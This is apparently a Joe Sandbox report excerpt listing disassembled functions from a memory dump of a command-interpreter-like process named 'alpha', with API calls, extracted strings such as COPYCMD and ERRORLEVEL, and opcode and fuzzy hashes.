API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
Instruction ID: 84dc9204f0bdf6795759e90a07af6f2815cadad470fd3fd0ffa5bed5d67eedbc
Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
Instruction Fuzzy Hash: 9E01D624F08643A5E754A715E460079F7A0FF88B52BF09474D50D83E54DEACF8D5C320

Function 00007FF7823E9A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF7823E9A86
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7823E9A97

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Concurrency::cancel_current_taskmalloc
String ID:
API String ID: 1412018758-0
Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
Instruction ID: 0acaeeffe5221622a478c68359f63696255b99e89004fe0622172e96b5870b2e
Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
Instruction Fuzzy Hash: 3AE06D04F09207A1FE253BA2A86107892447F18742EA814B8DD0D0AF82EEACE499C330

Function 00007FF7823DCD90 Relevance: 2.5, APIs: 2, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDA6
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDBD

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
Instruction ID: 0b83759cb8bbf4c04520715e515cc31c47f5580e82245f16b140522067c25896
Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
Instruction Fuzzy Hash: 69F03175E1864286EB44AB15F8500B8FBA0FB89B42BB89539D90E03754DF7CE885C720

Function 00007FF7823E4C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

exit.MSVCRT(?,?,00000000,00007FF7823F1209), ref: 00007FF7823E4C31

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: exit
String ID:
API String ID: 2483651598-0
Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
Instruction ID: b49e022e1f6f7388d69f0c1ec66d1aa41d257a134d75b7a2d1f0f7fc7a0c9762
Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
Instruction Fuzzy Hash: D3C01234704646A7EB1C7732646103999647B0C202F54547CC60A82A82DDACD808C234

Function 00007FF7823E5508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GetUserDefaultLCID.KERNELBASE(?,?,?,?,00007FF7823D6F97), ref: 00007FF7823E550C

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: DefaultUser
String ID:
API String ID: 3358694519-0
Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
Instruction ID: 3ce96235199bc744a1a4da9a2b2729aa7b8dc423fca2729c20f2a6aa6e19f1ff
Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
Instruction Fuzzy Hash: 9DE0C2EAD08253ABF5943B42E0513B49993EB78783FE440B5C60F02EC4C96D2885D228

Function 00007FF7823E2E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823E2E8B

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
Instruction ID: 5663b1c2a1c58b2f3add60708e504bb74ed94fddf846b321b2629b8c67e1f688
Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
Instruction Fuzzy Hash: 40F0B425B0979140EA40A757F9501299290AB88BE0B988375EA7C57FC5DE7CD451C700

Non-executed Functions

Function 00007FF7823D3410 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 160windowCOMMON

Download Yara Rule

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823D3477
wcschr.MSVCRT ref: 00007FF7823D34A0
FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823D34DF
_ultoa.MSVCRT ref: 00007FF7823F12DA
GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823F12E6
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7823F131E

Strings

, xrefs: 00007FF7823F12FB
Application, xrefs: 00007FF7823F1341
System, xrefs: 00007FF7823F133A

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
String ID: $Application$System
API String ID: 3538039442-1881496484
Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
Instruction ID: 32098c014e345cc6cc3d9bbb17c95a8a9f933a78b55aa1ecc746a82d7de45fe2
Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
Instruction Fuzzy Hash: C251D332B08B4193EB619B15F41467AFAA1FB89B46F948138DE4E03B54DF7CE845CB20

Function 00007FF7823D372C Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 396COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823D3921

Part of subcall function 00007FF7823E09F4: iswspace.MSVCRT ref: 00007FF7823E0A11
Part of subcall function 00007FF7823E09F4: wcschr.MSVCRT ref: 00007FF7823E0A2B

wcsrchr.MSVCRT ref: 00007FF7823D37D2
_wcsnicmp.MSVCRT ref: 00007FF7823D381A
wcsrchr.MSVCRT ref: 00007FF7823D3A0C
wcsrchr.MSVCRT ref: 00007FF7823D3A35
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823D3A9D
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D3ACC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823D3AE1
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D3B1E

Strings

\, xrefs: 00007FF7823D3AB9
COPYCMD, xrefs: 00007FF7823D37AE

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
String ID: COPYCMD$\
API String ID: 3989487059-1802776761
Opcode ID: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
Instruction ID: 0be6c8a049f1a91011ad49935cf0f2b3526e5bd633ce7819a7ba7eddc132b3a9
Opcode Fuzzy Hash: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
Instruction Fuzzy Hash: 27F1D665B0874681FF50BB15E4242BAE7A0FF45B89FA44079CE4E47B94DEBCE845C710

Function 00007FF7823E7FF8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87filenativeCOMMON

Download Yara Rule

APIs

RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL ref: 00007FF7823E802B
NtOpenFile.NTDLL ref: 00007FF7823E8092
RtlReleaseRelativeName.NTDLL ref: 00007FF7823E80A4
RtlFreeUnicodeString.NTDLL ref: 00007FF7823E80B4

Part of subcall function 00007FF7823E8114: NtQueryVolumeInformationFile.NTDLL ref: 00007FF7823E8151

CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7823E80E2
NtSetInformationFile.NTDLL ref: 00007FF7823F0327
DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823F0342
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823F0356

Strings

@P, xrefs: 00007FF7823E805E

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
String ID: @P
API String ID: 1801357106-3670739982
Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
Instruction ID: 1c6b5600da51185aa26a912f01a0e7fcf59bfadc6024babe589057a24df95dcd
Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
Instruction Fuzzy Hash: 9E417D32B04A41DBE710AF65E4503EDBBA0FB89749F948275DA0D43A98DFB8D948C760

Function 00007FF7823D1884 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 380COMMON

Download Yara Rule

APIs

wcsrchr.MSVCRT ref: 00007FF7823D194E
_wcsnicmp.MSVCRT ref: 00007FF7823D19A1
wcsrchr.MSVCRT ref: 00007FF7823D1A1D
_wcsnicmp.MSVCRT ref: 00007FF7823D1A75

Strings

COPYCMD, xrefs: 00007FF7823D192B, 00007FF7823D19F9

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _wcsnicmpwcsrchr
String ID: COPYCMD
API String ID: 2429825313-3727491224
Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
Instruction ID: b4e5a07742cb1dbaa6c7fe22f2cf61b388d2a572d9396e0ce1e72b2aee086b19
Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
Instruction Fuzzy Hash: EEF1C432F0860286FB61AF55A0641BDB6F1BB0479AFA04179DE5D23ED8DFBCA444C760

Function 00007FF7823D9B50 Relevance: 7.8, APIs: 5, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
Instruction ID: 1ce39be5f352f93f2856085d01a7f4bde01f541d0a5b31d07bdb68cb88a58b70
Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
Instruction Fuzzy Hash: 65A1E525B1865291EB50BB25E4646B9F6A1FF88B82FE04179DD4E43F90DFBCE405C720

Function 00007FF7823E081C Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 130COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E084E
_wcsicmp.MSVCRT ref: 00007FF7823E088E
_wcsicmp.MSVCRT ref: 00007FF7823E08AC
_wcsicmp.MSVCRT ref: 00007FF7823E08CA
_wcsicmp.MSVCRT ref: 00007FF7823E08E8
_wcsicmp.MSVCRT ref: 00007FF7823E0906
_wcsicmp.MSVCRT ref: 00007FF7823E0924
_wcsicmp.MSVCRT ref: 00007FF7823E093E
_wcsicmp.MSVCRT ref: 00007FF7823E095C

Strings

TIME, xrefs: 00007FF7823E091A
HIGHESTNUMANODENUMBER, xrefs: 00007FF7823E0952
CMDCMDLINE, xrefs: 00007FF7823E08DE
.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, xrefs: 00007FF7823E0835
ERRORLEVEL, xrefs: 00007FF7823E08A2
RANDOM, xrefs: 00007FF7823E0934
DATE, xrefs: 00007FF7823E08FC
CMDEXTVERSION, xrefs: 00007FF7823E08C0

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _wcsicmp$EnvironmentVariable
String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
API String ID: 198002717-267741548
Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
Instruction ID: 81dce35f078de9de8548cd1d8424c466a29977f0982f50db8c9ed547376c9713
Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
Instruction Fuzzy Hash: ED512F25A0864395E6507F12E820179EBA0FF59B82FE49079D90E53A65DFBCE448C770

Function 00007FF7823DEF40 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 465COMMON

Download Yara Rule

APIs

iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7823DE626,?,?,00000000,00007FF7823E1F69), ref: 00007FF7823DF000
wcschr.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF031
iswdigit.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF0D6

Strings

Ungetting: '%s', xrefs: 00007FF7823ED0E1
()|&=,;", xrefs: 00007FF7823DF3EC, 00007FF7823DF6D0
=,;, xrefs: 00007FF7823DEF9D, 00007FF7823DF1CE, 00007FF7823DF342, 00007FF7823DF61A

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: iswdigitiswspacewcschr
String ID: ()|&=,;"$=,;$Ungetting: '%s'
API String ID: 1595556998-2755026540
Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
Instruction ID: fbc8f7448039f819c41ba7784a869135ce78cc80f9b59a8e4388052ce38108d4
Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
Instruction Fuzzy Hash: 5522BD69E1C65281FA607B12A4A8279F6A0BF04793FF4417AD94D43AE4CFBCE845C731

Function 00007FF7823DD3F0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 310memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD46E
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD485
wcschr.MSVCRT ref: 00007FF7823DD4EE
iswspace.MSVCRT ref: 00007FF7823DD54D
wcschr.MSVCRT ref: 00007FF7823DD569
wcschr.MSVCRT ref: 00007FF7823DD58C
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD5EE
HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD605
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD61F
HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD633

Strings

=,;, xrefs: 00007FF7823DD4D0
", xrefs: 00007FF7823DD5AB

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$Processwcschr$Alloc$Sizeiswspace
String ID: "$=,;
API String ID: 3545743878-4143597401
Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
Instruction ID: 571098adb341530978b79eb45e1e2b674326e52859c03c4e449c667151526290
Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
Instruction Fuzzy Hash: BAC1C566E0965681EB657F11D024379FAA1FF44F46FE580B9CE4E03B94EFBCA845C220

Function 00007FF7823F5BF4 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 153windowthreadCOMMON

Download Yara Rule

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823F5CD5
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823F5D54

Strings

[%hs], xrefs: 00007FF7823F5E1D
Exception, xrefs: 00007FF7823F5CA0
CallContext:[%hs] , xrefs: 00007FF7823F5DDD
%hs(%d) tid(%x) %08X %ws, xrefs: 00007FF7823F5D6D
%hs(%u)\%hs!%p: , xrefs: 00007FF7823F5D01
ReturnHr, xrefs: 00007FF7823F5C97
(caller: %p) , xrefs: 00007FF7823F5D3F
Msg:[%ws] , xrefs: 00007FF7823F5DC2
%hs!%p: , xrefs: 00007FF7823F5D1F
[%hs(%hs)], xrefs: 00007FF7823F5E04
FailFast, xrefs: 00007FF7823F5C85
, xrefs: 00007FF7823F5DA7
LogHr, xrefs: 00007FF7823F5C8E

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
